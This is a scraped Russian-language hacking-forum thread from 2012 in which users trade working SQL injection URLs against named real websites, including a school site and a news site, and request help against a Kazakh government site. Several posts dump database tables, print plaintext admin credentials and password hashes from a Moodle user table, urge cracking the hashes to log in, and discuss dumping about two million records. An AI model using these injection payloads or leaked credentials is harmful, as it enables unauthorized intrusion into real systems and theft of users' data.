 |
|
11.02.2012, 16:12
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
Сообщение от ivan151
вот с разных полей вообще получается Admin-логин
pusti-пароль http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,login,3,4,password+from+lsh_infou sers
там походу два акка пользователей, в этой таблице, и ни один из них не авторизуется на сайте, поэтому я попробывал запрос http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,group_concat(table_name,0x3a,colu mn_name),3,4,5+from+information_schema.columns+whe re+column_name+like(0x257061737325)--+
и там еще есть таблички с колонкой пассворд попробуй перебрать их
например вот эту mdl_userassword
|
|
|
11.02.2012, 16:30
|
|
Познающий
Регистрация: 21.01.2012
Сообщений: 55
С нами:
7530806
Репутация:
0
|
|
Ребята помогите раскрутить эту скулю
http://www.mk.gov.kz/?lang=kaz&id_open_rubric=361&page=7
|
|
|
|
11.02.2012, 17:05
|
|
Познающий
Регистрация: 21.01.2012
Сообщений: 55
С нами:
7530806
Репутация:
0
|
|
Сообщение от ivan151
не пускает с такими данными-ошибка авторизации,а может кто нибудь посоветует как быть?линк дал
Данные правильные вот
Код:
1
Admin
pusti
Администратор,
2
obz
zbo
ОБЖ
|
|
|
|
11.02.2012, 17:15
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от anonym_di
Ребята помогите раскрутить эту скулю
http://www.mk.gov.kz/?lang=kaz&id_open_rubric=361&page=7
id_open_rubri - макс 5 символов
page - подставляется в лимит, скули нету.
|
|
|
|
11.02.2012, 17:28
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
2IVAN
я же тебе писал не поленись перебери таблицы, если этот сайт для тебя важен,
писал про таблицу mdl_user, вот что из туда выпало:
http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,group_concat(0x3a,id,username,0x3 a,password),3,4,5+from+u99526_moodle.mdl_user
Код:
,:2admin:6c83c300238522d49d616550f45f9394,:3uraev:622694bd4f
расшифруй и попробуй авторизоватся |
|
|
|
11.02.2012, 18:37
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
Сообщение от Ruslan1817
http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,group_concat(login,0x3a,password) %20,3,4,5+from+lsh_infousers+--+
А это чем не по душе?
просто он пишет что авторизоватся на сайте не может с теми даными что получил из таблицы lsh_infousers, я думаю стоит попробывать поискать записи юзверей в других таблицах, и как пример вытянул даные с таблицы mdl_user, где есть запись с login-admin, эту запись остается расшифровать и попробывать залогинится)))
|
|
|
|
12.02.2012, 15:37
|
|
Новичок
Регистрация: 09.01.2012
Сообщений: 21
С нами:
7548086
Репутация:
0
|
|
http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,column_name,3,4,5,6,7,8+from+in formation_schema.columns+where+table_name=0x757365 7273--+
А как здесь вытащить столбцы ?
|
|
|
|
12.02.2012, 16:06
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
Сообщение от bodrich
http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,column_name,3,4,5,6,7,8+from+in formation_schema.columns+where+table_name=0x757365 7273--+
А как здесь вытащить столбцы ?
вариант №1
http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,group_concat(column_name),3,4,5 ,6,7,8+from+information_schema.columns+where+table _name=0x75736572+limit+0,1--+ (где в хексе user)
вариант №2
http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,group_concat(column_name),3,4,5 ,6,7,8+from+information_schema.columns+where+table _name=0x62346d66715f7573657273+limit+0,1--+ (где в хексе b4mfq_users)
p.s. таблички к которой ты составлял запрос походу нету (users), ну или я ее не нашол))
|
|
|
|
12.02.2012, 23:46
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
С нами:
8200406
Репутация:
38
|
|
Ребят, из-за чего в MySQL скуле може НЕ РАБОТАТЬ where?
Первый раз с таким сталкиваюсь. Любой запрос содержащий where не отрабатывает... Из-за чего может быть? Есть ли аналоги? Нужно сделать дамп примерно 2 000 000 записей. Лимит естественно ложит БД.
p.s. фильтрации нету вроде ни на что. MySQL >=5
|
|
|
|
13.02.2012, 01:10
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от Pirotexnik
Ребят, из-за чего в MySQL скуле може
НЕ РАБОТАТЬ
where
?
Первый раз с таким сталкиваюсь. Любой запрос содержащий
where
не отрабатывает... Из-за чего может быть? Есть ли аналоги? Нужно сделать дамп примерно 2 000 000 записей. Лимит естественно ложит БД.
p.s. фильтрации нету вроде ни на что. MySQL >=5
фильтр. хотя слабо верится.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
